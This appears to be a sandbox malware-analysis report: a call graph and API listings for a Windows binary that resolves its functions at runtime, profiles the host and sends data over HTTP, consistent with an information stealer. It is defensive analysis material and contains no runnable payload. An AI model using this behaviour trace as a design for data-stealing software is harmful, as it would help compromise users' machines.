6d3f7c 27318->27319 27320 6d4a60 2 API calls 27319->27320 27321 6d3f92 27320->27321 27322 6d4a60 2 API calls 27321->27322 27323 6d3fa8 27322->27323 27324 6d4a60 2 API calls 27323->27324 27325 6d3fbe 27324->27325 27326 6d4a60 2 API calls 27325->27326 27327 6d3fd4 27326->27327 27328 6d4a60 2 API calls 27327->27328 27329 6d3fea 27328->27329 27330 6d4a60 2 API calls 27329->27330 27331 6d4003 27330->27331 27332 6d4a60 2 API calls 27331->27332 27333 6d4019 27332->27333 27334 6d4a60 2 API calls 27333->27334 27335 6d402f 27334->27335 27336 6d4a60 2 API calls 27335->27336 27337 6d4045 27336->27337 27338 6d4a60 2 API calls 27337->27338 27339 6d405b 27338->27339 27340 6d4a60 2 API calls 27339->27340 27341 6d4071 27340->27341 27342 6d4a60 2 API calls 27341->27342 27343 6d408a 27342->27343 27344 6d4a60 2 API calls 27343->27344 27345 6d40a0 27344->27345 27346 6d4a60 2 API calls 27345->27346 27347 6d40b6 27346->27347 27348 6d4a60 2 API calls 27347->27348 27349 6d40cc 27348->27349 27350 6d4a60 2 API calls 27349->27350 27351 6d40e2 27350->27351 27352 6d4a60 2 API calls 27351->27352 27353 6d40f8 27352->27353 27354 6d4a60 2 API calls 27353->27354 27355 6d4111 27354->27355 27356 6d4a60 2 API calls 27355->27356 27357 6d4127 27356->27357 27358 6d4a60 2 API calls 27357->27358 27359 6d413d 27358->27359 27360 6d4a60 2 API calls 27359->27360 27361 6d4153 27360->27361 27362 6d4a60 2 API calls 27361->27362 27363 6d4169 27362->27363 27364 6d4a60 2 API calls 27363->27364 27365 6d417f 27364->27365 27366 6d4a60 2 API calls 27365->27366 27367 6d4198 27366->27367 27368 6d4a60 2 API calls 27367->27368 27369 6d41ae 27368->27369 27370 6d4a60 2 API calls 27369->27370 27371 6d41c4 27370->27371 27372 6d4a60 2 API calls 27371->27372 27373 6d41da 27372->27373 27374 6d4a60 2 API calls 27373->27374 27375 6d41f0 27374->27375 27376 6d4a60 2 API calls 27375->27376 27377 6d4206 27376->27377 27378 6d4a60 2 API calls 27377->27378 27379 6d421f 27378->27379 27380 6d4a60 2 API calls 27379->27380 27381 6d4235 27380->27381 27382 6d4a60 2 API calls 27381->27382 27383 6d424b 27382->27383 27384 6d4a60 2 API calls 27383->27384 27385 6d4261 27384->27385 27386 6d4a60 2 API calls 27385->27386 27387 6d4277 27386->27387 27388 6d4a60 2 API calls 27387->27388 27389 6d428d 27388->27389 27390 6d4a60 2 API calls 27389->27390 27391 6d42a6 27390->27391 27392 6d4a60 2 API calls 27391->27392 27393 6d42bc 27392->27393 27394 6d4a60 2 API calls 27393->27394 27395 6d42d2 27394->27395 27396 6d4a60 2 API calls 27395->27396 27397 6d42e8 27396->27397 27398 6d4a60 2 API calls 27397->27398 27399 6d42fe 27398->27399 27400 6d4a60 2 API calls 27399->27400 27401 6d4314 27400->27401 27402 6d4a60 2 API calls 27401->27402 27403 6d432d 27402->27403 27404 6d4a60 2 API calls 27403->27404 27405 6d4343 27404->27405 27406 6d4a60 2 API calls 27405->27406 27407 6d4359 27406->27407 27408 6d4a60 2 API calls 27407->27408 27409 6d436f 27408->27409 27410 6d4a60 2 API calls 27409->27410 27411 6d4385 27410->27411 27412 6d4a60 2 API calls 27411->27412 27413 6d439b 27412->27413 27414 6d4a60 2 API calls 27413->27414 27415 6d43b4 27414->27415 27416 6d4a60 2 API calls 27415->27416 27417 6d43ca 27416->27417 27418 6d4a60 2 API calls 27417->27418 27419 6d43e0 27418->27419 27420 6d4a60 2 API calls 27419->27420 27421 6d43f6 27420->27421 27422 6d4a60 2 API calls 27421->27422 27423 6d440c 27422->27423 27424 6d4a60 2 API calls 27423->27424 27425 6d4422 27424->27425 27426 6d4a60 2 API calls 27425->27426 27427 6d443b 27426->27427 27428 6d4a60 2 API calls 27427->27428 27429 6d4451 27428->27429 27430 6d4a60 2 API calls 27429->27430 27431 6d4467 27430->27431 27432 6d4a60 2 API calls 27431->27432 27433 6d447d 27432->27433 27434 6d4a60 2 API calls 27433->27434 27435 6d4493 27434->27435 27436 6d4a60 2 API calls 27435->27436 27437 6d44a9 27436->27437 27438 6d4a60 2 API calls 27437->27438 27439 6d44c2 27438->27439 27440 6d4a60 2 API calls 27439->27440 27441 6d44d8 27440->27441 27442 6d4a60 2 API calls 27441->27442 27443 6d44ee 27442->27443 27444 6d4a60 2 API calls 27443->27444 27445 6d4504 27444->27445 27446 6d4a60 2 API calls 27445->27446 27447 6d451a 27446->27447 27448 6d4a60 2 API calls 27447->27448 27449 6d4530 27448->27449 27450 6d4a60 2 API calls 27449->27450 27451 6d4549 27450->27451 27452 6d4a60 2 API calls 27451->27452 27453 6d455f 27452->27453 27454 6d4a60 2 API calls 27453->27454 27455 6d4575 27454->27455 27456 6d4a60 2 API calls 27455->27456 27457 6d458b 27456->27457 27458 6d4a60 2 API calls 27457->27458 27459 6d45a1 27458->27459 27460 6d4a60 2 API calls 27459->27460 27461 6d45b7 27460->27461 27462 6d4a60 2 API calls 27461->27462 27463 6d45d0 27462->27463 27464 6d4a60 2 API calls 27463->27464 27465 6d45e6 27464->27465 27466 6d4a60 2 API calls 27465->27466 27467 6d45fc 27466->27467 27468 6d4a60 2 API calls 27467->27468 27469 6d4612 27468->27469 27470 6d4a60 2 API calls 27469->27470 27471 6d4628 27470->27471 27472 6d4a60 2 API calls 27471->27472 27473 6d463e 27472->27473 27474 6d4a60 2 API calls 27473->27474 27475 6d4657 27474->27475 27476 6d4a60 2 API calls 27475->27476 27477 6d466d 27476->27477 27478 6d4a60 2 API calls 27477->27478 27479 6d4683 27478->27479 27480 6d4a60 2 API calls 27479->27480 27481 6d4699 27480->27481 27482 6d4a60 2 API calls 27481->27482 27483 6d46af 27482->27483 27484 6d4a60 2 API calls 27483->27484 27485 6d46c5 27484->27485 27486 6d4a60 2 API calls 27485->27486 27487 6d46de 27486->27487 27488 6d4a60 2 API calls 27487->27488 27489 6d46f4 27488->27489 27490 6d4a60 2 API calls 27489->27490 27491 6d470a 27490->27491 27492 6d4a60 2 API calls 27491->27492 27493 6d4720 27492->27493 27494 6d4a60 2 API calls 27493->27494 27495 6d4736 27494->27495 27496 6d4a60 2 API calls 27495->27496 27497 6d474c 27496->27497 27498 6d4a60 2 API calls 27497->27498 27499 6d4765 27498->27499 27500 6d4a60 2 API calls 27499->27500 27501 6d477b 27500->27501 27502 6d4a60 2 API calls 27501->27502 27503 6d4791 27502->27503 27504 6d4a60 2 API calls 27503->27504 27505 6d47a7 27504->27505 27506 6d4a60 2 API calls 27505->27506 27507 6d47bd 27506->27507 27508 6d4a60 2 API calls 27507->27508 27509 6d47d3 27508->27509 27510 6d4a60 2 API calls 27509->27510 27511 6d47ec 27510->27511 27512 6d4a60 2 API calls 27511->27512 27513 6d4802 27512->27513 27514 6d4a60 2 API calls 27513->27514 27515 6d4818 27514->27515 27516 6d4a60 2 API calls 27515->27516 27517 6d482e 27516->27517 27518 6d4a60 2 API calls 27517->27518 27519 6d4844 27518->27519 27520 6d4a60 2 API calls 27519->27520 27521 6d485a 27520->27521 27522 6d4a60 2 API calls 27521->27522 27523 6d4873 27522->27523 27524 6d4a60 2 API calls 27523->27524 27525 6d4889 27524->27525 27526 6d4a60 2 API calls 27525->27526 27527 6d489f 27526->27527 27528 6d4a60 2 API calls 27527->27528 27529 6d48b5 27528->27529 27530 6d4a60 2 API calls 27529->27530 27531 6d48cb 27530->27531 27532 6d4a60 2 API calls 27531->27532 27533 6d48e1 27532->27533 27534 6d4a60 2 API calls 27533->27534 27535 6d48fa 27534->27535 27536 6d4a60 2 API calls 27535->27536 27537 6d4910 27536->27537 27538 6d4a60 2 API calls 27537->27538 27539 6d4926 27538->27539 27540 6d4a60 2 API calls 27539->27540 27541 6d493c 27540->27541 27542 6d4a60 2 API calls 27541->27542 27543 6d4952 27542->27543 27544 6d4a60 2 API calls 27543->27544 27545 6d4968 27544->27545 27546 6d4a60 2 API calls 27545->27546 27547 6d4981 27546->27547 27548 6d4a60 2 API calls 27547->27548 27549 6d4997 27548->27549 27550 6d4a60 2 API calls 27549->27550 27551 6d49ad 27550->27551 27552 6d4a60 2 API calls 27551->27552 27553 6d49c3 27552->27553 27554 6d4a60 2 API calls 27553->27554 27555 6d49d9 27554->27555 27556 6d4a60 2 API calls 27555->27556 27557 6d49ef 27556->27557 27558 6d4a60 2 API calls 27557->27558 27559 6d4a08 27558->27559 27560 6d4a60 2 API calls 27559->27560 27561 6d4a1e 27560->27561 27562 6d4a60 2 API calls 27561->27562 27563 6d4a34 27562->27563 27564 6d4a60 2 API calls 27563->27564 27565 6d4a4a 27564->27565 27566 6f66e0 27565->27566 27567 6f6afe 8 API calls 27566->27567 27568 6f66ed 43 API calls 27566->27568 27569 6f6c08 27567->27569 27570 6f6b94 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27567->27570 27568->27567 27571 6f6c15 8 API calls 27569->27571 27572 6f6cd2 27569->27572 27570->27569 27571->27572 27573 6f6d4f 27572->27573 27574 6f6cdb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27572->27574 27575 6f6d5c 6 API calls 27573->27575 27576 6f6de9 27573->27576 27574->27573 27575->27576 27577 6f6df6 12 API calls 27576->27577 27578 6f6f10 27576->27578 27577->27578 27579 6f6f8d 27578->27579 27580 6f6f19 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27578->27580 27581 6f6f96 GetProcAddress GetProcAddress 27579->27581 27582 6f6fc1 27579->27582 27580->27579 27581->27582 27583 6f6fca GetProcAddress GetProcAddress 27582->27583 27584 6f6ff5 27582->27584 27583->27584 27585 6f70ed 27584->27585 27586 6f7002 10 API calls 27584->27586 27587 6f70f6 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27585->27587 27588 6f7152 27585->27588 27586->27585 27587->27588 27589 6f716e 27588->27589 27590 6f715b GetProcAddress 27588->27590 27591 6f7177 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27589->27591 27592 6f051f 27589->27592 27590->27589 27591->27592 27593 6d1530 27592->27593 27902 6d1610 27593->27902 27595 6d153b 27596 6d1555 lstrcpy 27595->27596 27597 6d155d 27595->27597 27596->27597 27598 6d1577 lstrcpy 27597->27598 27599 6d157f 27597->27599 27598->27599 27600 6d1599 lstrcpy 27599->27600 27602 6d15a1 27599->27602 27600->27602 27601 6d1605 27604 6ef1b0 lstrlen 27601->27604 27602->27601 27603 6d15fd lstrcpy 27602->27603 27603->27601 27605 6ef1e4 27604->27605 27606 6ef1eb lstrcpy 27605->27606 27607 6ef1f7 lstrlen 27605->27607 27606->27607 27608 6ef208 27607->27608 27609 6ef20f lstrcpy 27608->27609 27610 6ef21b lstrlen 27608->27610 27609->27610 27611 6ef22c 27610->27611 27612 6ef233 lstrcpy 27611->27612 27613 6ef23f 27611->27613 27612->27613 27614 6ef258 lstrcpy 27613->27614 27615 6ef264 27613->27615 27614->27615 27616 6ef286 lstrcpy 27615->27616 27617 6ef292 27615->27617 27616->27617 27618 6ef2ba lstrcpy 27617->27618 27619 6ef2c6 27617->27619 27618->27619 27620 6ef2ea lstrcpy 27619->27620 27682 6ef300 27619->27682 27620->27682 27621 6ef30c lstrlen 27621->27682 27622 6ef4b9 lstrcpy 27622->27682 27623 6ef3a1 lstrcpy 27623->27682 27624 6ef3c5 lstrcpy 27624->27682 27625 6ef4e8 lstrcpy 27685 6ef4f0 27625->27685 27626 6d1530 8 API calls 27626->27685 27627 6eee90 28 API calls 27627->27682 27628 6eefb0 35 API calls 27628->27685 27629 6ef479 lstrcpy 27629->27682 27630 6ef70f StrCmpCA 27636 6efe8e 27630->27636 27630->27682 27631 6ef616 StrCmpCA 27631->27630 27631->27685 27632 6ef59c lstrcpy 27632->27685 27633 6efa29 StrCmpCA 27642 6efe2b 27633->27642 27633->27682 27634 6ef73e lstrlen 27634->27682 27635 6efead lstrlen 27650 6efec7 27635->27650 27636->27635 27641 6efea5 lstrcpy 27636->27641 27637 6efd4d StrCmpCA 27639 6efd60 Sleep 27637->27639 27647 6efd75 27637->27647 27638 6efa58 lstrlen 27638->27682 27639->27682 27640 6ef64a lstrcpy 27640->27685 27641->27635 27643 6efe4a lstrlen 27642->27643 27644 6efe42 lstrcpy 27642->27644 27656 6efe64 27643->27656 27644->27643 27645 6eee90 28 API calls 27645->27685 27646 6ef89e lstrcpy 27646->27682 27648 6efd94 lstrlen 27647->27648 27652 6efd8c lstrcpy 27647->27652 27658 6efdae 27648->27658 27649 6ef76f lstrcpy 27649->27682 27651 6efee7 lstrlen 27650->27651 27654 6efedf lstrcpy 27650->27654 27664 6eff01 27651->27664 27652->27648 27653 6efbb8 lstrcpy 27653->27682 27654->27651 27655 6efa89 lstrcpy 27655->27682 27657 6efdce lstrlen 27656->27657 27659 6efe7c lstrcpy 27656->27659 27672 6efde8 27657->27672 27658->27657 27670 6efdc6 lstrcpy 27658->27670 27659->27657 27660 6ef791 lstrcpy 27660->27682 27662 6d1530 8 API calls 27662->27682 27663 6ef8cd lstrcpy 27663->27685 27665 6eff21 27664->27665 27666 6eff19 lstrcpy 27664->27666 27667 6d1610 4 API calls 27665->27667 27666->27665 27688 6efe13 27667->27688 27668 6efaab lstrcpy 27668->27682 27669 6ef698 lstrcpy 27669->27685 27670->27657 27671 6efbe7 lstrcpy 27671->27685 27673 6efe08 27672->27673 27674 6efe00 lstrcpy 27672->27674 27675 6d1610 4 API calls 27673->27675 27674->27673 27675->27688 27676 6ef7e2 lstrcpy 27676->27682 27677 6ef924 lstrcpy 27677->27685 27678 6ef99e StrCmpCA 27678->27633 27678->27685 27679 6efafc lstrcpy 27679->27682 27680 6efcb8 StrCmpCA 27680->27637 27680->27685 27681 6efc3e lstrcpy 27681->27685 27682->27621 27682->27622 27682->27623 27682->27624 27682->27625 27682->27627 27682->27629 27682->27630 27682->27633 27682->27634 27682->27637 27682->27638 27682->27646 27682->27649 27682->27653 27682->27655 27682->27660 27682->27662 27682->27663 27682->27668 27682->27671 27682->27676 27682->27679 27682->27685 27683 6ef9cb lstrcpy 27683->27685 27684 6efce9 lstrcpy 27684->27685 27685->27626 27685->27628 27685->27631 27685->27632 27685->27633 27685->27637 27685->27640 27685->27645 27685->27669 27685->27677 27685->27678 27685->27680 27685->27681 27685->27682 27685->27683 27685->27684 27686 6efa19 lstrcpy 27685->27686 27687 6efd3a lstrcpy 27685->27687 27686->27685 27687->27685 27688->26712 27690 6f278c GetVolumeInformationA 27689->27690 27691 6f2785 27689->27691 27692 6f27ec GetProcessHeap RtlAllocateHeap 27690->27692 27691->27690 27694 6f2826 wsprintfA 27692->27694 27695 6f2822 27692->27695 27694->27695 27912 6f71e0 27695->27912 27699 6d4c70 27698->27699 27700 6d4c85 27699->27700 27702 6d4c7d lstrcpy 27699->27702 27916 6d4bc0 27700->27916 27702->27700 27703 6d4c90 27704 6d4ccc lstrcpy 27703->27704 27705 6d4cd8 27703->27705 27704->27705 27706 6d4cff lstrcpy 27705->27706 27707 6d4d0b 27705->27707 27706->27707 27708 6d4d2f lstrcpy 27707->27708 27709 6d4d3b 27707->27709 27708->27709 27710 6d4d6d lstrcpy 27709->27710 27711 6d4d79 27709->27711 27710->27711 27712 6d4dac InternetOpenA StrCmpCA 27711->27712 27713 6d4da0 lstrcpy 27711->27713 27714 6d4de0 27712->27714 27713->27712 27715 6d54b8 InternetCloseHandle CryptStringToBinaryA 27714->27715 27920 6f3e70 27714->27920 27716 6d54e8 LocalAlloc 27715->27716 27733 6d55d8 27715->27733 27718 6d54ff CryptStringToBinaryA 27716->27718 27716->27733 27719 6d5529 lstrlen 27718->27719 27720 6d5517 LocalFree 27718->27720 27721 6d553d 27719->27721 27720->27733 27723 6d5557 lstrcpy 27721->27723 27724 6d5563 lstrlen 27721->27724 27722 6d4dfa 27725 6d4e23 lstrcpy lstrcat 27722->27725 27726 6d4e38 27722->27726 27723->27724 27728 6d557d 27724->27728 27725->27726 27727 6d4e5a lstrcpy 27726->27727 27730 6d4e62 27726->27730 27727->27730 27729 6d558f lstrcpy lstrcat 27728->27729 27731 6d55a2 27728->27731 27729->27731 27732 6d4e71 lstrlen 27730->27732 27734 6d55d1 27731->27734 27736 6d55c9 lstrcpy 27731->27736 27735 6d4e89 27732->27735 27733->26741 27734->27733 27737 6d4e95 lstrcpy lstrcat 27735->27737 27738 6d4eac 27735->27738 27736->27734 27737->27738 27739 6d4ed5 27738->27739 27740 6d4ecd lstrcpy 27738->27740 27741 6d4edc lstrlen 27739->27741 27740->27739 27742 6d4ef2 27741->27742 27743 6d4efe lstrcpy lstrcat 27742->27743 27744 6d4f15 27742->27744 27743->27744 27745 6d4f36 lstrcpy 27744->27745 27746 6d4f3e 27744->27746 27745->27746 27747 6d4f65 lstrcpy lstrcat 27746->27747 27748 6d4f7b 27746->27748 27747->27748 27749 6d4fa4 27748->27749 27750 6d4f9c lstrcpy 27748->27750 27751 6d4fab lstrlen 27749->27751 27750->27749 27752 6d4fc1 27751->27752 27753 6d4fcd lstrcpy lstrcat 27752->27753 27754 6d4fe4 27752->27754 27753->27754 27755 6d500d 27754->27755 27756 6d5005 lstrcpy 27754->27756 27757 6d5014 lstrlen 27755->27757 27756->27755 27758 6d502a 27757->27758 27759 6d5036 lstrcpy lstrcat 27758->27759 27760 6d504d 27758->27760 27759->27760 27761 6d5079 27760->27761 27762 6d5071 lstrcpy 27760->27762 27763 6d5080 lstrlen 27761->27763 27762->27761 27764 6d509b 27763->27764 27765 6d50ac lstrcpy lstrcat 27764->27765 27766 6d50bc 27764->27766 27765->27766 27767 6d50da lstrcpy lstrcat 27766->27767 27768 6d50ed 27766->27768 27767->27768 27769 6d510b lstrcpy 27768->27769 27770 6d5113 27768->27770 27769->27770 27771 6d5121 InternetConnectA 27770->27771 27771->27715 27772 6d5150 HttpOpenRequestA 27771->27772 27773 6d518b 27772->27773 27774 6d54b1 InternetCloseHandle 27772->27774 27927 6f7310 lstrlen 27773->27927 27774->27715 27778 6d51a4 27935 6f72c0 27778->27935 27781 6f7280 lstrcpy 27782 6d51c0 27781->27782 27783 6f7310 3 API calls 27782->27783 27784 6d51d5 27783->27784 27785 6f7280 lstrcpy 27784->27785 27786 6d51de 27785->27786 27787 6f7310 3 API calls 27786->27787 27788 6d51f4 27787->27788 27789 6f7280 lstrcpy 27788->27789 27790 6d51fd 27789->27790 27791 6f7310 3 API calls 27790->27791 27792 6d5213 27791->27792 27793 6f7280 lstrcpy 27792->27793 27794 6d521c 27793->27794 27795 6f7310 3 API calls 27794->27795 27796 6d5231 27795->27796 27797 6f7280 lstrcpy 27796->27797 27798 6d523a 27797->27798 27799 6f72c0 2 API calls 27798->27799 27800 6d524d 27799->27800 27801 6f7280 lstrcpy 27800->27801 27802 6d5256 27801->27802 27803 6f7310 3 API calls 27802->27803 27804 6d526b 27803->27804 27805 6f7280 lstrcpy 27804->27805 27806 6d5274 27805->27806 27807 6f7310 3 API calls 27806->27807 27808 6d5289 27807->27808 27809 6f7280 lstrcpy 27808->27809 27810 6d5292 27809->27810 27811 6f72c0 2 API calls 27810->27811 27812 6d52a5 27811->27812 27813 6f7280 lstrcpy 27812->27813 27814 6d52ae 27813->27814 27815 6f7310 3 API calls 27814->27815 27816 6d52c3 27815->27816 27817 6f7280 lstrcpy 27816->27817 27818 6d52cc 27817->27818 27819 6f7310 3 API calls 27818->27819 27820 6d52e2 27819->27820 27821 6f7280 lstrcpy 27820->27821 27822 6d52eb 27821->27822 27823 6f7310 3 API calls 27822->27823 27824 6d5301 27823->27824 27825 6f7280 lstrcpy 27824->27825 27826 6d530a 27825->27826 27827 6f7310 3 API calls 27826->27827 27828 6d531f 27827->27828 27829 6f7280 lstrcpy 27828->27829 27830 6d5328 27829->27830 27831 6f72c0 2 API calls 27830->27831 27832 6d533b 27831->27832 27833 6f7280 lstrcpy 27832->27833 27834 6d5344 27833->27834 27835 6d537c 27834->27835 27836 6d5370 lstrcpy 27834->27836 27837 6f72c0 2 API calls 27835->27837 27836->27835 27838 6d538a 27837->27838 27839 6f72c0 2 API calls 27838->27839 27840 6d5397 27839->27840 27841 6f7280 lstrcpy 27840->27841 27842 6d53a1 27841->27842 27843 6d53b1 lstrlen lstrlen HttpSendRequestA InternetReadFile 27842->27843 27844 6d549c InternetCloseHandle 27843->27844 27848 6d53f2 27843->27848 27846 6d54ae 27844->27846 27845 6d53fd lstrlen 27845->27848 27846->27774 27847 6d542e lstrcpy lstrcat 27847->27848 27848->27844 27848->27845 27848->27847 27849 6d5473 27848->27849 27850 6d546b lstrcpy 27848->27850 27851 6d547a InternetReadFile 27849->27851 27850->27849 27851->27844 27851->27848 27853 6e8cc6 ExitProcess 27852->27853 27868 6e8ccd 27852->27868 27854 6e8ee2 27854->26743 27855 6e8e6f StrCmpCA 27855->27868 27856 6e8e88 lstrlen 27856->27868 27857 6e8d06 lstrlen 27857->27868 27858 6e8d84 StrCmpCA 27858->27868 27859 6e8da4 StrCmpCA 27859->27868 27860 6e8dbd StrCmpCA 27860->27868 27861 6e8ddd StrCmpCA 27861->27868 27862 6e8dfd StrCmpCA 27862->27868 27863 6e8e1d StrCmpCA 27863->27868 27864 6e8e3d StrCmpCA 27864->27868 27865 6e8d5a lstrlen 27865->27868 27866 6e8e56 StrCmpCA 27866->27868 27867 6e8d30 lstrlen 27867->27868 27868->27854 27868->27855 27868->27856 27868->27857 27868->27858 27868->27859 27868->27860 27868->27861 27868->27862 27868->27863 27868->27864 27868->27865 27868->27866 27868->27867 27869 6e8ebb lstrcpy 27868->27869 27869->27868 27870->26749 27871->26751 27872->26757 27873->26759 27874->26765 27875->26767 27876->26773 27877->26777 27878->26783 27879->26785 27880->26789 27881->26803 27882->26807 27883->26806 27884->26802 27885->26806 27886->26824 27887->26809 27888->26810 27889->26814 27890->26820 27891->26821 27892->26827 27893->26835 27894->26837 27895->26860 27896->26864 27897->26863 27898->26859 27899->26863 27900->26873 27903 6d161f 27902->27903 27904 6d162b lstrcpy 27903->27904 27905 6d1633 27903->27905 27904->27905 27906 6d164d lstrcpy 27905->27906 27907 6d1655 27905->27907 27906->27907 27908 6d1677 27907->27908 27909 6d166f lstrcpy 27907->27909 27910 6d1699 27908->27910 27911 6d1691 lstrcpy 27908->27911 27909->27908 27910->27595 27911->27910 27913 6f71e6 27912->27913 27914 6f71fc lstrcpy 27913->27914 27915 6f2860 27913->27915 27914->27915 27915->26738 27917 6d4bd0 27916->27917 27917->27917 27918 6d4bd7 ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI lstrlen InternetCrackUrlA 27917->27918 27919 6d4c41 27918->27919 27919->27703 27921 6f3e83 27920->27921 27922 6f3e9f lstrcpy 27921->27922 27923 6f3eab 27921->27923 27922->27923 27924 6f3ecd lstrcpy 27923->27924 27925 6f3ed5 GetSystemTime 27923->27925 27924->27925 27926 6f3ef3 27925->27926 27926->27722 27929 6f732d 27927->27929 27928 6d519b 27931 6f7280 27928->27931 27929->27928 27930 6f733d lstrcpy lstrcat 27929->27930 27930->27928 27932 6f728c 27931->27932 27933 6f72b4 27932->27933 27934 6f72ac lstrcpy 27932->27934 27933->27778 27934->27933 27936 6f72dc 27935->27936 27937 6d51b7 27936->27937 27938 6f72ed lstrcpy lstrcat 27936->27938 27937->27781 27938->27937 27967 6f31f0 GetSystemInfo wsprintfA 27994 6e8615 48 API calls 27945 6ee049 147 API calls 27984 6e8615 49 API calls 27951 6f3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27995 6f33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27963 6e3959 244 API calls 27968 6e01d9 126 API calls 27946 6f2853 lstrcpy 27952 6f2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27986 6e4b29 303 API calls 27996 6e23a9 298 API calls 27953 6f30a0 GetSystemPowerStatus 27969 6f29a0 GetCurrentProcess IsWow64Process 27973 6df639 144 API calls 27975 6d16b9 200 API calls 27987 6dbf39 177 API calls 27997 6eabb2 120 API calls 27965 6f3130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27990 6db309 98 API calls 27954 6e8c88 16 API calls 27955 6f2880 10 API calls 27956 6f4480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27957 6f3480 6 API calls 27976 6f3280 7 API calls 27959 6f749e malloc ctype 27998 6ddb99 672 API calls 27999 6e8615 47 API calls 27960 6e2499 290 API calls 27966 6f4e35 8 API calls 27991 6f9711 8 API calls __setmbcp 27949 6f2c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA

                            Executed Functions

                            Function 006D4C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D4C7F
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D4CD2
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D4D05
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D4D35
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D4D73
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006D4DA6
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006D4DB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: 51ab15b177a7f64a09ada284c634ceea4c79e882528145787d10979312424fcb
                            • Instruction ID: d90a244b70ab545eeb151177bf72109519c8b4f5c6128ef8f521dc48decc2010
                            • Opcode Fuzzy Hash: 51ab15b177a7f64a09ada284c634ceea4c79e882528145787d10979312424fcb
                            • Instruction Fuzzy Hash: 07527D71E1521A9FCB61EFA4DC49BAE77BAAF04310F08402AF906AB351DB34DD418B94
                            Function 006F6390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2125 6f6390-6f63bd GetPEB 2126 6f65c3-6f6623 LoadLibraryA * 5 2125->2126 2127 6f63c3-6f65be call 6f62f0 GetProcAddress * 20 2125->2127 2128 6f6638-6f663f 2126->2128 2129 6f6625-6f6633 GetProcAddress 2126->2129 2127->2126 2131 6f666c-6f6673 2128->2131 2132 6f6641-6f6667 GetProcAddress * 2 2128->2132 2129->2128 2134 6f6688-6f668f 2131->2134 2135 6f6675-6f6683 GetProcAddress 2131->2135 2132->2131 2136 6f66a4-6f66ab 2134->2136 2137 6f6691-6f669f GetProcAddress 2134->2137 2135->2134 2139 6f66ad-6f66d2 GetProcAddress * 2 2136->2139 2140 6f66d7-6f66da 2136->2140 2137->2136 2139->2140
                            APIs
                            • GetProcAddress.KERNEL32(76210000,01011668), ref: 006F63E9
                            • GetProcAddress.KERNEL32(76210000,01011680), ref: 006F6402
                            • GetProcAddress.KERNEL32(76210000,010116E0), ref: 006F641A
                            • GetProcAddress.KERNEL32(76210000,01011518), ref: 006F6432
                            • GetProcAddress.KERNEL32(76210000,01018B28), ref: 006F644B
                            • GetProcAddress.KERNEL32(76210000,01005228), ref: 006F6463
                            • GetProcAddress.KERNEL32(76210000,01004FC8), ref: 006F647B
                            • GetProcAddress.KERNEL32(76210000,01011698), ref: 006F6494
                            • GetProcAddress.KERNEL32(76210000,010116C8), ref: 006F64AC
                            • GetProcAddress.KERNEL32(76210000,010117B8), ref: 006F64C4
                            • GetProcAddress.KERNEL32(76210000,010117D0), ref: 006F64DD
                            • GetProcAddress.KERNEL32(76210000,010051A8), ref: 006F64F5
